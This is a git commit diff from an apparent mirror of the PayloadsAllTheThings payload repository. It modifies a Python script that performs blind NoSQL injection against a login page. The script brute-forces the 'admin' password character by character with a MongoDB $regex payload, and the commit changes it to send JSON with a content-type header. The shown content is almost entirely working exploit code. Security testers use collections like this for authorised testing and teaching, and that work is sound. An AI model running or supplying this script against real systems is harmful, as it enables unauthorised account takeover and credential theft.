mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
commit
bd861e304f
@ -63,12 +63,13 @@ urllib3.disable_warnings()
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
headers={'content-type': 'application/json'}
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|']:
|
||||
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||
r = requests.post(u, data = {'ids': payload}, verify = False)
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False)
|
||||
if 'OK' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
|
Loading…
Reference in New Issue
Block a user